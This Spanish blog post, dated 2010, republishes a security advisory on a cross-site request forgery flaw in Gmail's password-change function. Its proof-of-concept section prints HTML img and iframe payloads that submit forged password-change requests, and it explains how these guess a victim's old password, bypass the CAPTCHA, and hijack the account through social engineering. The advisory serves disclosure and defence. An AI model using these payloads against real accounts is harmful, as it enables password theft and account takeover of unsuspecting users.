5 ago. 2010

[CSRF] en GMail

I. LA VULNERABILIDAD:

Vulnerabilidad CSRF en el servicio Gmail.

II. ANTECEDENTES:

Gmail es el servicio de correo gratuito de Google. Viene con la tecnología de Googlesearch integrada y más de 2.600 megabytes de almacenamiento (y crece cada día). Se pueden guardar todos los mensajes recibidos, archivos e imágenes para siempre, Gmail tiene una búsqueda rápida y fácil para encontrar cualquier cosa que se esté buscando, entre otros servicios.

III. DESCRIPCIÓN:

Cross-Site Request Forgery, también conocido como  CSRF o XSRF, es una especie de hazaña de los sitios web maliciosos. Aunque este tipo de ataque tiene similitudes con la de cross-site scripting (XSS), cross-site scripting requiere del atacante para inyectar código no autorizado en un sitio web, mientras el CSRF se limitaba a transmitir comandos no autorizados de un usuario sin su permiso.

Gmail es vulnerable a ataques CSRF en la función "Cambiar contraseña". Con sólo una autentificación del usuario la cookie es enviada automáticamente por el navegador y se repite en cada petición sin necesidad de autentificarse denuevo.

Un atacante puede crear una página que incluye las solicitudes a la función de cambio de "contraseña "funcionalidad de GMail y modificar las contraseñas de los usuarios que, estando identificado, visite la página del atacante.

El ataque se facilita ya que la petición "Cambiar contraseña" es realizada a través del método HTTP GET en lugar del método POST que se realiza habitualmente.

IV. PRUEBA DE CONCEPTO:

1. Un atacante crea una página web "csrf-attack.html" que realizan muchas peticiones GET HTTP a la función "Cambiar contraseña".

Por ejemplo, un crackeao de contraseñas de 3 intentos (ver el parámetro "OldPasswd"):
...
<img
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save";>
<img
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123&p=&save=Save";>
<img
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123&p=&save=Save";>
...

o con marcos ocultos:
...
<iframe
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save";>
<iframe
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save";>
<iframe
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save";>
...

El atacante puede utilizar deliberadamente una nueva contraseña débil (ver "passwd" y parámetros "PasswdAgain" ), de esta manera se puede saber si la contraseña es correcta analizados sin necesidad de modificar la contraseña de la víctima.

El uso de contraseñas débiles en "Cambiar contraseña" La respuesta es:
- " The password you gave is incorrect. ", Analizó si la contraseña no es correcta.
- " We're sorry, but you've selected an insecure password. In order
to protect the security of your account, please click "Password
Strength" to get tips on choosing to safer password. ", Analizó si la contraseña es correcta y la contraseña de la víctima no se modifica.

Si el atacante desea modificar la contraseña del usuario víctima, el mensaje de respuesta esperado es: " Your new password has been saved - OK ".

En cualquier caso, el atacante eludr las restricciones impuestas por el captcha en la forma de autenticación.

2. Un usuario autenticado en GMail visita "csrf-attack.html página" controlado por el atacante.

Por ejemplo, el atacante envía un correo electrónico a la víctima (una cuenta de GMail) y provoca que la víctima visita a su página (ingeniería social). Por lo tanto, el atacante se asegura que la víctima se haya autenticado.

3. El robo de contraseñas se ejecuta de forma transparente a la víctima.

V. impacto en las empresas

- Denegación de servicio selectivo en los usuarios del servicio Gmail (cambiar la contraseña de usuario).
- Posible acceso al correo de otros usuarios de GMail.

VI. SISTEMAS AFECTADOS:

Gmail servicio.

VII. SOLUCIÓN:

No hay solución aportada por el fabricante.

VIII. REFERENCIAS:

http://www.gmail.com

IX. CRÉDITOS

Esta vulnerabilidad ha sido descubierta y reportada por
Vicente Aguilera Díaz (vaguilera (a) isecauditors (punto) com).

Fuente: http://seclists.org/

Author & Editor

Ingeniero Civil en Computación (Universidad de Chile FCFM) y Diplomado en Gestión y Evaluación de Proyectos TI (Universidad de Chile FEN). Actualmente trabajo como Project Manager en varios proyectos y como asesor tecnológico para empresas.

0 Notaciones:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (25) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (1) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (130) Hack Tips (63) Hacked (6) Hacking (18) Hacking Hardware (5) HashCat (1) Herramientas (121) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (1) Leaks (21) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (193) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (145) Seguridad Web (140) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (17) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (66) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.